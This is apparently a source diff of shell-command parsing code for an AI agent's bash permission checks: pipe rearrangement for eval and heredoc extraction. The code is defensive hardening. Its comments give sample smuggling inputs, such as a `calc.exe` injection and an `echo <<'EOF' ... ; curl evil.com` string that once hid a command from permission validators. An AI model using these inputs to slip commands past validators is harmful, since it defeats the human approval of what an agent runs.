 * This fixes an issue where eval treats the entire piped command as a single unit,
 * causing the stdin redirect to apply to eval itself rather than the first command.
 *
 * Whenever the command cannot be safely tokenized and rebuilt, the original
 * text is left untouched and returned through quoteWithEvalStdinRedirect
 * (whole command single-quoted, `< /dev/null` applied to eval itself).
 *
 * @param command - Raw shell command text
 * @returns Text intended to follow `eval`: either the rebuilt pipeline as one
 *   single-quoted argument, or the quoted original followed by ` < /dev/null`
 */
export function rearrangePipeCommand(command: string): string {
  // Skip if command has backticks - shell-quote doesn't handle them well
  if (command.includes('`')) {
    return quoteWithEvalStdinRedirect(command)
  }

  // Skip if command has command substitution - shell-quote parses $() incorrectly,
  // treating ( and ) as separate operators instead of recognizing command substitution
  if (command.includes('$(')) {
    return quoteWithEvalStdinRedirect(command)
  }

  // Skip if command references shell parameters: named variables ($VAR, ${VAR}),
  // positional parameters ($1) and special parameters ($?, $$, $!, $#, $@, $*, $-).
  // shell-quote's parse() expands all of these to empty string when no env is
  // passed, silently dropping the reference. Even if we preserved the token via
  // an env function, quote() would then escape the $ during rebuild, preventing
  // runtime expansion. See #9732.
  // The check is deliberately quote-blind: a false positive only routes the
  // command through the eval fallback, which keeps the text verbatim.
  if (/\$[A-Za-z0-9_{@*#?!$-]/.test(command)) {
    return quoteWithEvalStdinRedirect(command)
  }

  // Skip if command contains bash control structures (for/while/until/if/case/select)
  // shell-quote cannot parse these correctly and will incorrectly find pipes inside
  // the control structure body, breaking the command when rearranged
  if (containsControlStructure(command)) {
    return quoteWithEvalStdinRedirect(command)
  }

  // Join continuation lines before parsing: shell-quote doesn't handle \<newline>
  // and produces empty string tokens for each occurrence, causing spurious empty
  // arguments in the reconstructed command
  const joined = joinContinuationLines(command)

  // shell-quote treats bare newlines as whitespace, not command separators.
  // Parsing+rebuilding 'cmd1 | head\ncmd2 | grep' yields 'cmd1 | head cmd2 | grep',
  // silently merging pipelines. Line-continuation (\<newline>) is already stripped
  // above; any remaining newline is a real separator. Bail to the eval fallback,
  // which preserves the newline inside a single-quoted arg. See #32515.
  if (joined.includes('\n')) {
    return quoteWithEvalStdinRedirect(command)
  }

  // SECURITY: shell-quote treats \' inside single quotes as an escape, but
  // bash treats it as literal \ followed by a closing quote. The pattern
  // '\' <payload> '\' makes shell-quote merge <payload> into the quoted
  // string, hiding operators like ; from the token stream. Rebuilding from
  // that merged token can expose the operators when bash re-parses.
  if (hasShellQuoteSingleQuoteBug(joined)) {
    return quoteWithEvalStdinRedirect(command)
  }

  const parseResult = tryParseShellCommand(joined)

  // If parsing fails (malformed syntax), fall back to quoting the whole command
  if (!parseResult.success) {
    return quoteWithEvalStdinRedirect(command)
  }

  const parsed = parseResult.tokens

  // SECURITY: shell-quote tokenizes differently from bash. Input like
  // `echo {"hi":\"hi;calc.exe"}` is a bash syntax error (unbalanced quote),
  // but shell-quote parses it into tokens with `;` as an operator and
  // `calc.exe` as a separate word. Rebuilding from those tokens produces
  // valid bash that executes `calc.exe` — turning a syntax error into an
  // injection. Unbalanced delimiters in a string token signal this
  // misparsing; fall back to whole-command quoting, which preserves the
  // original (bash then rejects it with the same syntax error it would have
  // raised without us).
  if (hasMalformedTokens(joined, parsed)) {
    return quoteWithEvalStdinRedirect(command)
  }

  const firstPipeIndex = findFirstPipeOperator(parsed)

  // No pipe at all (-1), or a pipe with nothing in front of it (0): there is
  // no first command to attach the redirect to.
  if (firstPipeIndex <= 0) {
    return quoteWithEvalStdinRedirect(command)
  }

  // Rebuild: first_command < /dev/null | rest_of_pipeline
  const parts = [
    ...buildCommandParts(parsed, 0, firstPipeIndex),
    '< /dev/null',
    ...buildCommandParts(parsed, firstPipeIndex, parsed.length),
  ]

  return singleQuoteForEval(parts.join(' '))
}
|
||||
|
||||
/**
 * Locates the first `|` operator entry in a parsed shell command.
 *
 * @param parsed - Entries produced by parsing the command
 * @returns Index of the first pipe operator, or -1 when there is none
 */
function findFirstPipeOperator(parsed: ParseEntry[]): number {
  return parsed.findIndex(candidate => isOperator(candidate, '|'))
}
|
||||
|
||||
/**
 * Turns the parsed entries in the half-open range `[start, end)` back into
 * shell source fragments, one fragment per output element.
 *
 * - A standard file descriptor (0, 1 or 2) followed by a recognized
 *   redirection (`>&N`, `>/dev/null`, or `> &N`) is emitted as one fused
 *   fragment such as `2>&1`.
 * - Leading `NAME=value` words of a command keep their `=` unquoted; only the
 *   value goes through quote().
 * - Every other string is passed through quote().
 * - Glob operators contribute their raw pattern; other operators contribute
 *   their `op` text. Entries that are neither strings nor operators are dropped.
 *
 * @param parsed - Parsed command entries
 * @param start - Index of the first entry to emit (inclusive)
 * @param end - Index one past the last entry to emit (exclusive)
 * @returns The rebuilt fragments, in order
 */
function buildCommandParts(
  parsed: ParseEntry[],
  start: number,
  end: number,
): string[] {
  const isStandardFd = (value: unknown): value is string =>
    typeof value === 'string' && /^[012]$/.test(value)

  // Returns the fused redirection text when the three entries beginning at
  // `index` form a recognized fd redirection, otherwise null.
  const fuseFdRedirection = (index: number): string | null => {
    const fd = parsed[index]
    if (!isStandardFd(fd) || index + 2 >= end || !isOperator(parsed[index + 1])) {
      return null
    }

    const operator = (parsed[index + 1] as { op: string }).op
    const target = parsed[index + 2]

    // 2>&1 style
    if (operator === '>&') {
      return isStandardFd(target) ? `${fd}>&${target}` : null
    }

    if (operator !== '>') {
      return null
    }

    // 2>/dev/null style
    if (target === '/dev/null') {
      return `${fd}>/dev/null`
    }

    // 2> &1 style (space between > and &1)
    if (typeof target === 'string' && target.startsWith('&')) {
      const duplicatedFd = target.slice(1)
      if (/^[012]$/.test(duplicatedFd)) {
        return `${fd}>&${duplicatedFd}`
      }
    }

    return null
  }

  const fragments: string[] = []
  // Assignments are only recognized before the first ordinary word of a command.
  let commandWordSeen = false
  let cursor = start

  while (cursor < end) {
    const fused = fuseFdRedirection(cursor)
    if (fused !== null) {
      fragments.push(fused)
      cursor += 3 // fd, operator and target were all consumed
      continue
    }

    const entry = parsed[cursor]
    cursor += 1

    if (typeof entry === 'string') {
      if (!commandWordSeen && isEnvironmentVariableAssignment(entry)) {
        // Keep NAME= verbatim and quote only the value so spaces and special
        // characters in it survive.
        const equalsAt = entry.indexOf('=')
        const variableName = entry.slice(0, equalsAt)
        const quotedValue = quote([entry.slice(equalsAt + 1)])
        fragments.push(`${variableName}=${quotedValue}`)
      } else {
        // From here on every string is the command word or one of its arguments.
        commandWordSeen = true
        fragments.push(quote([entry]))
      }
      continue
    }

    if (!isOperator(entry)) {
      continue
    }

    if (entry.op === 'glob' && 'pattern' in entry) {
      // Glob patterns stay unquoted so the shell can still expand them.
      fragments.push(entry.pattern as string)
      continue
    }

    fragments.push(entry.op)
    // The command after a separator may carry its own assignments.
    if (isCommandSeparator(entry.op)) {
      commandWordSeen = false
    }
  }

  return fragments
}
|
||||
|
||||
/**
 * Tells whether a word has the shape of an environment variable assignment
 * (`NAME=value`): a name starting with a letter or underscore, continuing with
 * letters, digits or underscores, immediately followed by `=`.
 *
 * @param str - The word to inspect
 * @returns true when `str` begins with `NAME=`
 */
function isEnvironmentVariableAssignment(str: string): boolean {
  const assignmentPrefix = /^[A-Za-z_][A-Za-z0-9_]*=/
  return assignmentPrefix.exec(str) !== null
}
|
||||
|
||||
/**
 * Checks if an operator is a command separator that starts a new command context.
 * After these operators, environment variable assignments are valid again.
 *
 * Besides the list operators `&&`, `||` and `;`, this covers the pipeline
 * operators `|` and `|&` and the background operator `&`: in bash each of them
 * is followed by a fresh simple command, which may begin with `NAME=value`
 * words (e.g. `a | b | FOO=bar c`).
 *
 * @param op - Operator text taken from a parsed operator entry
 * @returns true when the word after `op` begins a new command
 */
function isCommandSeparator(op: string): boolean {
  switch (op) {
    case '&&':
    case '||':
    case ';':
    case '|':
    case '|&':
    case '&':
      return true
    default:
      return false
  }
}
|
||||
|
||||
/**
 * Type guard for operator entries, i.e. non-null objects that carry an `op`
 * property.
 *
 * @param entry - Any parsed entry (or arbitrary value)
 * @param op - When given and non-empty, the entry's `op` must equal it
 * @returns true when `entry` is an operator (and matches `op`, if requested)
 */
function isOperator(entry: unknown, op?: string): entry is { op: string } {
  if (typeof entry !== 'object' || entry === null || !('op' in entry)) {
    return false
  }
  if (!op) {
    // No specific operator requested: any operator entry qualifies.
    return true
  }
  return entry.op === op
}
|
||||
|
||||
/**
 * Detects bash control-structure keywords (for/while/until/if/case/select)
 * that shell-quote cannot parse.
 *
 * A keyword only counts when it starts at a word boundary and is directly
 * followed by whitespace, which limits false positives from commands or
 * arguments that merely contain one of these words.
 *
 * @param command - Raw shell command text
 * @returns true when such a keyword occurrence is present
 */
function containsControlStructure(command: string): boolean {
  const keywordThenWhitespace = /\b(for|while|until|if|case|select)\s/
  return command.search(keywordThenWhitespace) !== -1
}
|
||||
|
||||
/**
 * Quotes a whole command for eval and attaches `< /dev/null` as a redirect on
 * eval itself rather than as one of eval's arguments. This is the path taken
 * for pipe commands whose pipe boundary cannot be parsed (e.g. commands with
 * $(), backticks, or control structures).
 *
 * Result shape: eval 'cmd' < /dev/null
 *   → eval's stdin is /dev/null, eval evaluates 'cmd', pipes inside work correctly
 *
 * The earlier `quote([cmd, '<', '/dev/null'])` form produced: eval 'cmd' \< /dev/null
 *   → eval concatenates args to 'cmd < /dev/null', redirect applies to LAST pipe command
 *
 * @param command - Raw shell command text
 * @returns The single-quoted command followed by ` < /dev/null`
 */
function quoteWithEvalStdinRedirect(command: string): string {
  const quotedCommand = singleQuoteForEval(command)
  return `${quotedCommand} < /dev/null`
}
|
||||
|
||||
/**
 * Wraps a string in single quotes so it can be passed to eval as one argument.
 * Each embedded single quote becomes '"'"' (close the single-quoted run, emit
 * a double-quoted single quote, reopen the single-quoted run).
 *
 * Preferred over shell-quote's quote(), which switches to double-quote mode
 * when the input contains single quotes and then escapes ! -> \!, corrupting
 * jq/awk filters like `select(.x != .y)` into `select(.x \!= .y)`.
 *
 * @param s - Text to quote
 * @returns `s` as a single shell word
 */
function singleQuoteForEval(s: string): string {
  const escapedBody = s.split("'").join(`'"'"'`)
  return `'${escapedBody}'`
}
|
||||
|
||||
/**
 * Joins shell continuation lines (backslash-newline) into a single line.
 *
 * Outside single quotes a backslash escapes the character that follows it, so
 * a newline is a continuation only when an odd number of backslashes precedes
 * it: the last backslash and the newline are removed, the preceding pairs are
 * kept. With an even number, all backslashes pair up and the newline stays as
 * a real separator.
 *
 * Inside single quotes bash keeps backslash and newline literally (as in a
 * multi-line sed script), so nothing is joined there. Removing them would
 * silently change the argument; leaving them lets the caller see the newline.
 *
 * Quote tracking is intentionally simple: `'` and `"` toggle state and a
 * backslash outside single quotes skips the next character. If the tracking
 * is wrong for some exotic input, the only effect is that a backslash-newline
 * is kept or removed exactly as a quote-blind scan would have done.
 *
 * @param command - Raw shell command text
 * @returns The command with continuation lines joined
 */
function joinContinuationLines(command: string): string {
  const pieces: string[] = []
  let inSingleQuote = false
  let inDoubleQuote = false
  let i = 0

  while (i < command.length) {
    const ch = command[i]!

    if (inSingleQuote) {
      // Everything up to the closing quote is literal, including "\" + newline.
      if (ch === "'") inSingleQuote = false
      pieces.push(ch)
      i += 1
      continue
    }

    if (ch === '\\') {
      const next = command[i + 1]
      if (next !== '\n') {
        // Ordinary escape pair (or a trailing lone backslash): copy verbatim
        // and step over the escaped character so it cannot toggle quote state.
        pieces.push(next === undefined ? ch : ch + next)
      }
      // For "\" + newline nothing is emitted: that is the line continuation.
      i += 2
      continue
    }

    if (ch === '"') {
      inDoubleQuote = !inDoubleQuote
    } else if (ch === "'" && !inDoubleQuote) {
      inSingleQuote = true
    }
    pieces.push(ch)
    i += 1
  }

  return pieces.join('')
}
|
||||
File diff suppressed because it is too large
Load Diff
@@ -0,0 +1,733 @@
|
||||
/**
|
||||
* Heredoc extraction and restoration utilities.
|
||||
*
|
||||
* The shell-quote library parses `<<` as two separate `<` redirect operators,
|
||||
* which breaks command splitting for heredoc syntax. This module provides
|
||||
* utilities to extract heredocs before parsing and restore them after.
|
||||
*
|
||||
* Supported heredoc variations:
|
||||
* - <<WORD - basic heredoc
|
||||
* - <<'WORD' - single-quoted delimiter (no variable expansion in content)
|
||||
* - <<"WORD" - double-quoted delimiter (with variable expansion)
|
||||
* - <<-WORD - dash prefix (strips leading tabs from content)
|
||||
* - <<-'WORD' - combined dash and quoted delimiter
|
||||
*
|
||||
* Known limitations:
|
||||
* - Heredocs inside backtick command substitution may not be extracted
|
||||
* - Very complex multi-heredoc scenarios may not be extracted
|
||||
*
|
||||
* When extraction fails, the command passes through unchanged. This is safe
|
||||
* because the unextracted heredoc will either cause shell-quote parsing to fail
|
||||
* (falling back to treating the whole command as one unit) or require manual
|
||||
* approval for each apparent subcommand.
|
||||
*
|
||||
* @module
|
||||
*/
|
||||
|
||||
import { randomBytes } from 'crypto'
|
||||
|
||||
/** Leading marker of a heredoc placeholder (placeholders look like `__HEREDOC_0_a1b2c3d4__`). */
const HEREDOC_PLACEHOLDER_PREFIX = '__HEREDOC_'

/** Trailing marker of a heredoc placeholder. */
const HEREDOC_PLACEHOLDER_SUFFIX = '__'
|
||||
|
||||
/**
 * Produces a random hex string that makes placeholders unique, so they cannot
 * collide with command text that literally contains "__HEREDOC_N__".
 *
 * @returns 16 lowercase hex characters (8 random bytes)
 */
function generatePlaceholderSalt(): string {
  const saltBytes = randomBytes(8)
  return saltBytes.toString('hex')
}
|
||||
|
||||
/**
 * Matches the start of a heredoc: the `<<` operator, an optional `-`, optional
 * spaces/tabs, and the delimiter word.
 *
 * Capture groups:
 *   1 - `-` when the operator is `<<-`
 *   2 - the quote character (`'` or `"`) of a quoted delimiter
 *   3 - the delimiter of a quoted heredoc
 *   4 - the delimiter of an unquoted heredoc
 *
 * The delimiter has two alternatives because a backslash means different
 * things in each:
 *
 * Quoted: (['"]) (\\?\w+) \2
 *   A leading backslash is part of the delimiter, since it is literal inside
 *   quotes:
 *     <<'\EOF'  → delimiter is \EOF
 *     <<"\EOF"  → delimiter is \EOF
 *     <<'EOF'   → delimiter is EOF
 *
 * Unquoted: \\?(\w+)
 *   A leading backslash is an escape and is consumed outside the capture:
 *     <<\EOF    → delimiter is EOF
 *     <<EOF     → delimiter is EOF
 *
 * SECURITY: keep the backslash INSIDE the capture group for quoted delimiters
 * and OUTSIDE it for unquoted ones. An earlier pattern had \\? outside the
 * group unconditionally, so <<'\EOF' yielded "EOF" while bash uses "\EOF",
 * which allowed command smuggling.
 *
 * `(?<!<)` and `(?!<)` reject `<<` that is part of a longer run of `<` (such
 * as `<<<`). Whitespace after the operator is [ \t]* rather than \s* so the
 * match never crosses a newline, which would be a security issue (commands
 * could hide between << and the delimiter).
 */
const HEREDOC_START_PATTERN =
  // eslint-disable-next-line custom-rules/no-lookbehind-regex -- gated by command.includes('<<') at extractHeredocs() entry
  /(?<!<)<<(?!<)(-)?[ \t]*(?:(['"])(\\?\w+)\2|\\?(\w+))/
|
||||
|
||||
/** Location and text of one heredoc found in a command string. */
export type HeredocInfo = {
  /** Entire heredoc text: the << operator, the delimiter, the body, and the closing delimiter */
  fullText: string
  /** Delimiter word with any surrounding quotes removed */
  delimiter: string
  /** Index in the original command where the << operator begins */
  operatorStartIndex: number
  /** Index just past the << operator (exclusive); same-line text after it is preserved */
  operatorEndIndex: number
  /** Index where the heredoc body begins (the newline preceding the body) */
  contentStartIndex: number
  /** Index just past the heredoc body, closing delimiter included (exclusive) */
  contentEndIndex: number
}
|
||||
|
||||
/** Outcome of replacing the heredocs in a command with placeholders. */
export type HeredocExtractionResult = {
  /** Command text in which each extracted heredoc has been swapped for a placeholder */
  processedCommand: string
  /** Original heredoc details, keyed by the placeholder string that stands in for them */
  heredocs: Map<string, HeredocInfo>
}
|
||||
|
||||
/**
|
||||
* Extracts heredocs from a command string and replaces them with placeholders.
|
||||
*
|
||||
* This allows shell-quote to parse the command without mangling heredoc syntax.
|
||||
* After parsing, use `restoreHeredocs` to replace placeholders with original content.
|
||||
*
|
||||
* @param command - The shell command string potentially containing heredocs
|
||||
* @returns Object containing the processed command and a map of placeholders to heredoc info
|
||||
*
|
||||
* @example
|
||||
* ```ts
|
||||
* const result = extractHeredocs(`cat <<EOF
|
||||
* hello world
|
||||
* EOF`);
|
||||
* // result.processedCommand === "cat __HEREDOC_0_a1b2c3d4__" (salt varies)
|
||||
* // result.heredocs has the mapping to restore later
|
||||
* ```
|
||||
*/
|
||||
export function extractHeredocs(
|
||||
command: string,
|
||||
options?: { quotedOnly?: boolean },
|
||||
): HeredocExtractionResult {
|
||||
const heredocs = new Map<string, HeredocInfo>()
|
||||
|
||||
// Quick check: if no << present, skip processing
|
||||
if (!command.includes('<<')) {
|
||||
return { processedCommand: command, heredocs }
|
||||
}
|
||||
|
||||
// Security: Paranoid pre-validation. Our incremental quote/comment scanner
|
||||
// (see advanceScan below) does simplified parsing that cannot handle all
|
||||
// bash quoting constructs. If the command contains
|
||||
// constructs that could desync our quote tracking, bail out entirely
|
||||
// rather than risk extracting a heredoc with incorrect boundaries.
|
||||
// This is defense-in-depth: each construct below has caused or could
|
||||
// cause a security bypass if we attempt extraction.
|
||||
//
|
||||
// Specifically, we bail if the command contains:
|
||||
// 1. $'...' or $"..." (ANSI-C / locale quoting — our quote tracker
|
||||
// doesn't handle the $ prefix, would misparse the quotes)
|
||||
// 2. Backtick command substitution (backtick nesting has complex parsing
|
||||
// rules, and backtick acts as shell_eof_token for PST_EOFTOKEN in
|
||||
// make_cmd.c:606, enabling early heredoc closure that our parser
|
||||
// can't replicate)
|
||||
if (/\$['"]/.test(command)) {
|
||||
return { processedCommand: command, heredocs }
|
||||
}
|
||||
// Check for backticks in the command text before the first <<.
|
||||
// Backtick nesting has complex parsing rules, and backtick acts as
|
||||
// shell_eof_token for PST_EOFTOKEN (make_cmd.c:606), enabling early
|
||||
// heredoc closure that our parser can't replicate. We only check
|
||||
// before << because backticks in heredoc body content are harmless.
|
||||
const firstHeredocPos = command.indexOf('<<')
|
||||
if (firstHeredocPos > 0 && command.slice(0, firstHeredocPos).includes('`')) {
|
||||
return { processedCommand: command, heredocs }
|
||||
}
|
||||
|
||||
// Security: Check for arithmetic evaluation context before the first `<<`.
|
||||
// In bash, `(( x = 1 << 2 ))` uses `<<` as a BIT-SHIFT operator, not a
|
||||
// heredoc. If we mis-extract it, subsequent lines become "heredoc content"
|
||||
// and are hidden from security validators, while bash executes them as
|
||||
// separate commands. We bail entirely if `((` appears before `<<` without
|
||||
// a matching `))` — we can't reliably distinguish arithmetic `<<` from
|
||||
// heredoc `<<` in that context. Note: $(( is already caught by
|
||||
// validateDangerousPatterns, but bare (( is not.
|
||||
if (firstHeredocPos > 0) {
|
||||
const beforeHeredoc = command.slice(0, firstHeredocPos)
|
||||
// Count (( and )) occurrences — if unbalanced, `<<` may be arithmetic
|
||||
const openArith = (beforeHeredoc.match(/\(\(/g) || []).length
|
||||
const closeArith = (beforeHeredoc.match(/\)\)/g) || []).length
|
||||
if (openArith > closeArith) {
|
||||
return { processedCommand: command, heredocs }
|
||||
}
|
||||
}
|
||||
|
||||
// Create a global version of the pattern for iteration
|
||||
const heredocStartPattern = new RegExp(HEREDOC_START_PATTERN.source, 'g')
|
||||
|
||||
const heredocMatches: HeredocInfo[] = []
|
||||
// Security: When quotedOnly skips an unquoted heredoc, we still need to
|
||||
// track its content range so the nesting filter can reject quoted heredocs
|
||||
// that appear INSIDE the skipped unquoted heredoc's body. Without this,
|
||||
// `cat <<EOF\n<<'SAFE'\n$(evil)\nSAFE\nEOF` would extract <<'SAFE' as a
|
||||
// top-level heredoc, hiding $(evil) from validators — even though in bash,
|
||||
// $(evil) IS executed (unquoted <<EOF expands its body).
|
||||
const skippedHeredocRanges: Array<{
|
||||
contentStartIndex: number
|
||||
contentEndIndex: number
|
||||
}> = []
|
||||
let match: RegExpExecArray | null
|
||||
|
||||
// Incremental quote/comment scanner state.
|
||||
//
|
||||
// The regex walks forward through the command, and match.index is monotonically
|
||||
// increasing. Previously, isInsideQuotedString and isInsideComment each
|
||||
// re-scanned from position 0 on every match — O(n²) when the heredoc body
|
||||
// contains many `<<` (e.g. C++ with `std::cout << ...`). A 200-line C++
|
||||
// heredoc hit ~3.7ms per extractHeredocs call, and Bash security validation
|
||||
// calls extractHeredocs multiple times per command.
|
||||
//
|
||||
// Instead, track quote/comment/escape state incrementally and advance from
|
||||
// the last scanned position. This preserves the OLD helpers' exact semantics:
|
||||
//
|
||||
// Quote state (was isInsideQuotedString) is COMMENT-BLIND — it never sees
|
||||
// `#` and never skips characters for being "in a comment". Inside single
|
||||
// quotes, everything is literal. Inside double quotes, backslash escapes
|
||||
// the next char. An unquoted backslash run of odd length escapes the next
|
||||
// char.
|
||||
//
|
||||
// Comment state (was isInsideComment) observes quote state (# inside quotes
|
||||
// is not a comment) but NOT the reverse. The old helper used a per-call
|
||||
// `lineStart = lastIndexOf('\n', pos-1)+1` bound on which `#` to consider;
|
||||
// equivalently, any physical `\n` clears comment state — including `\n`
|
||||
// inside quotes (since lastIndexOf was quote-blind).
|
||||
//
|
||||
// SECURITY: Do NOT let comment mode suppress quote-state updates. If `#` put
|
||||
// the scanner in a mode that skipped quote chars, then `echo x#"\n<<...`
|
||||
// (where bash treats `#` as part of the word `x#`, NOT a comment) would
|
||||
// report the `<<` as unquoted and EXTRACT it — hiding content from security
|
||||
// validators. The old isInsideQuotedString was comment-blind; we preserve
|
||||
// that. Both old and new over-eagerly treat any unquoted `#` as a comment
|
||||
// (bash requires word-start), but since quote tracking is independent, the
|
||||
// over-eagerness only affects the comment check — causing SKIPS (safe
|
||||
// direction), never extra EXTRACTIONS.
|
||||
let scanPos = 0
|
||||
let scanInSingleQuote = false
|
||||
let scanInDoubleQuote = false
|
||||
let scanInComment = false
|
||||
// Inside "...": true if the previous char was a backslash (next char is escaped).
|
||||
// Carried across advanceScan calls so a `\` at scanPos-1 correctly escapes
|
||||
// the char at scanPos.
|
||||
let scanDqEscapeNext = false
|
||||
// Unquoted context: length of the consecutive backslash run ending at scanPos-1.
|
||||
// Used to determine if the char at scanPos is escaped (odd run = escaped).
|
||||
let scanPendingBackslashes = 0
|
||||
|
||||
const advanceScan = (target: number): void => {
|
||||
for (let i = scanPos; i < target; i++) {
|
||||
const ch = command[i]!
|
||||
|
||||
// Any physical newline clears comment state. The old isInsideComment
|
||||
// used `lineStart = lastIndexOf('\n', pos-1)+1` (quote-blind), so a
|
||||
// `\n` inside quotes still advanced lineStart. Match that here by
|
||||
// clearing BEFORE the quote branches.
|
||||
if (ch === '\n') scanInComment = false
|
||||
|
||||
if (scanInSingleQuote) {
|
||||
if (ch === "'") scanInSingleQuote = false
|
||||
continue
|
||||
}
|
||||
|
||||
if (scanInDoubleQuote) {
|
||||
if (scanDqEscapeNext) {
|
||||
scanDqEscapeNext = false
|
||||
continue
|
||||
}
|
||||
if (ch === '\\') {
|
||||
scanDqEscapeNext = true
|
||||
continue
|
||||
}
|
||||
if (ch === '"') scanInDoubleQuote = false
|
||||
continue
|
||||
}
|
||||
|
||||
// Unquoted context. Quote tracking is COMMENT-BLIND (same as the old
|
||||
// isInsideQuotedString): we do NOT skip chars for being inside a
|
||||
// comment. Only the `#` detection itself is gated on not-in-comment.
|
||||
if (ch === '\\') {
|
||||
scanPendingBackslashes++
|
||||
continue
|
||||
}
|
||||
const escaped = scanPendingBackslashes % 2 === 1
|
||||
scanPendingBackslashes = 0
|
||||
if (escaped) continue
|
||||
|
||||
if (ch === "'") scanInSingleQuote = true
|
||||
else if (ch === '"') scanInDoubleQuote = true
|
||||
else if (!scanInComment && ch === '#') scanInComment = true
|
||||
}
|
||||
scanPos = target
|
||||
}
|
||||
|
||||
while ((match = heredocStartPattern.exec(command)) !== null) {
|
||||
const startIndex = match.index
|
||||
|
||||
// Advance the incremental scanner to this match's position. After this,
|
||||
// scanInSingleQuote/scanInDoubleQuote/scanInComment reflect the parser
|
||||
// state immediately BEFORE startIndex, and scanPendingBackslashes is the
|
||||
// count of unquoted `\` immediately preceding startIndex.
|
||||
advanceScan(startIndex)
|
||||
|
||||
// Skip if this << is inside a quoted string (not a real heredoc operator).
|
||||
if (scanInSingleQuote || scanInDoubleQuote) {
|
||||
continue
|
||||
}
|
||||
|
||||
// Security: Skip if this << is inside a comment (after unquoted #).
|
||||
// In bash, `# <<EOF` is a comment — extracting it would hide commands on
|
||||
// subsequent lines as "heredoc content" while bash executes them.
|
||||
if (scanInComment) {
|
||||
continue
|
||||
}
|
||||
|
||||
// Security: Skip if this << is preceded by an odd number of backslashes.
|
||||
// In bash, `\<<EOF` is NOT a heredoc — `\<` is a literal `<`, then `<EOF`
|
||||
// is input redirection. Extracting it would drop same-line commands from
|
||||
// security checks. The scanner tracks the unquoted backslash run ending
|
||||
// immediately before startIndex (scanPendingBackslashes).
|
||||
if (scanPendingBackslashes % 2 === 1) {
|
||||
continue
|
||||
}
|
||||
|
||||
// Security: Bail if this `<<` falls inside the body of a previously
|
||||
// SKIPPED heredoc (unquoted heredoc in quotedOnly mode). In bash,
|
||||
// `<<` inside a heredoc body is just text — it's not a nested heredoc
|
||||
// operator. Extracting it would hide content that bash actually expands.
|
||||
let insideSkipped = false
|
||||
for (const skipped of skippedHeredocRanges) {
|
||||
if (
|
||||
startIndex > skipped.contentStartIndex &&
|
||||
startIndex < skipped.contentEndIndex
|
||||
) {
|
||||
insideSkipped = true
|
||||
break
|
||||
}
|
||||
}
|
||||
if (insideSkipped) {
|
||||
continue
|
||||
}
|
||||
|
||||
const fullMatch = match[0]
|
||||
const isDash = match[1] === '-'
|
||||
// Group 3 = quoted delimiter (may include backslash), group 4 = unquoted
|
||||
const delimiter = (match[3] || match[4])!
|
||||
const operatorEndIndex = startIndex + fullMatch.length
|
||||
|
||||
// Security: Two checks to verify our regex captured the full delimiter word.
|
||||
// Any mismatch between our parsed delimiter and bash's actual delimiter
|
||||
// could allow command smuggling past permission checks.
|
||||
|
||||
// Check 1: If a quote was captured (group 2), verify the closing quote
|
||||
// was actually matched by \2 in the regex (the quoted alternative requires
|
||||
// the closing quote). The regex's \w+ only matches [a-zA-Z0-9_], so
|
||||
// non-word chars inside quotes (spaces, hyphens, dots) cause \w+ to stop
|
||||
// early, leaving the closing quote unmatched.
|
||||
// Example: <<"EO F" — regex captures "EO", misses closing ", delimiter
|
||||
// should be "EO F" but we'd use "EO". Skip to prevent mismatch.
|
||||
const quoteChar = match[2]
|
||||
if (quoteChar && command[operatorEndIndex - 1] !== quoteChar) {
|
||||
continue
|
||||
}
|
||||
|
||||
// Security: Determine if the delimiter is quoted ('EOF', "EOF") or
|
||||
// escaped (\EOF). In bash, quoted/escaped delimiters suppress all
|
||||
// expansion in the heredoc body — content is literal text. Unquoted
|
||||
// delimiters (<<EOF) perform full shell expansion: $(), backticks,
|
||||
// and ${} in the body ARE executed. When quotedOnly is set, skip
|
||||
// unquoted heredocs so their bodies remain visible to security
|
||||
// validators (they may contain executable command substitutions).
|
||||
const isEscapedDelimiter = fullMatch.includes('\\')
|
||||
const isQuotedOrEscaped = !!quoteChar || isEscapedDelimiter
|
||||
// Note: We do NOT skip unquoted heredocs here anymore when quotedOnly is
|
||||
// set. Instead, we compute their content range and add them to
|
||||
// skippedHeredocRanges, then skip them AFTER finding the closing
|
||||
// delimiter. This lets the nesting filter correctly reject quoted
|
||||
// "heredocs" that appear inside unquoted heredoc bodies.
|
||||
|
||||
// Check 2: Verify the next character after our match is a bash word
|
||||
// terminator (metacharacter or end of string). Characters like word chars,
|
||||
// quotes, $, \ mean the bash word extends beyond our match
|
||||
// (e.g., <<'EOF'a where bash uses "EOFa" but we captured "EOF").
|
||||
// IMPORTANT: Only match bash's actual metacharacters — space (0x20),
|
||||
// tab (0x09), newline (0x0A), |, &, ;, (, ), <, >. Do NOT use \s which
|
||||
// also matches \r, \f, \v, and Unicode whitespace that bash treats as
|
||||
// regular word characters, not terminators.
|
||||
if (operatorEndIndex < command.length) {
|
||||
const nextChar = command[operatorEndIndex]!
|
||||
if (!/^[ \t\n|&;()<>]$/.test(nextChar)) {
|
||||
continue
|
||||
}
|
||||
}
|
||||
|
||||
// In bash, heredoc content starts on the NEXT LINE after the operator.
|
||||
// Any content on the same line after <<EOF (like " && echo done") is part
|
||||
// of the command, not the heredoc content.
|
||||
//
|
||||
// SECURITY: The "same line" must be the LOGICAL command line, not the
|
||||
// first physical newline. Multi-line quoted strings extend the logical
|
||||
// line — bash waits for the quote to close before starting to read the
|
||||
// heredoc body. A quote-blind `indexOf('\n')` finds newlines INSIDE
|
||||
// quoted strings, causing the body to start too early.
|
||||
//
|
||||
// Exploit: `echo <<'EOF' '${}\n' ; curl evil.com\nEOF`
|
||||
// - The `\n` inside `'${}\n'` is quoted (literal newline in a string arg)
|
||||
// - Bash: waits for `'` to close → logical line is
|
||||
// `echo <<'EOF' '${}\n' ; curl evil.com` → heredoc body = `EOF`
|
||||
// - Our old code: indexOf('\n') finds the quoted newline → body starts
|
||||
// at `' ; curl evil.com\nEOF` → curl swallowed into placeholder →
|
||||
// NEVER reaches permission checks.
|
||||
//
|
||||
// Fix: scan forward from operatorEndIndex using quote-state tracking,
|
||||
// finding the first newline that's NOT inside a quoted string. Same
|
||||
// quote-tracking semantics as advanceScan (already used to validate
|
||||
// the `<<` operator position above).
|
||||
let firstNewlineOffset = -1
|
||||
{
|
||||
let inSingleQuote = false
|
||||
let inDoubleQuote = false
|
||||
// We start with clean quote state — advanceScan already rejected the
|
||||
// case where the `<<` operator itself is inside a quote.
|
||||
for (let k = operatorEndIndex; k < command.length; k++) {
|
||||
const ch = command[k]
|
||||
if (inSingleQuote) {
|
||||
if (ch === "'") inSingleQuote = false
|
||||
continue
|
||||
}
|
||||
if (inDoubleQuote) {
|
||||
if (ch === '\\') {
|
||||
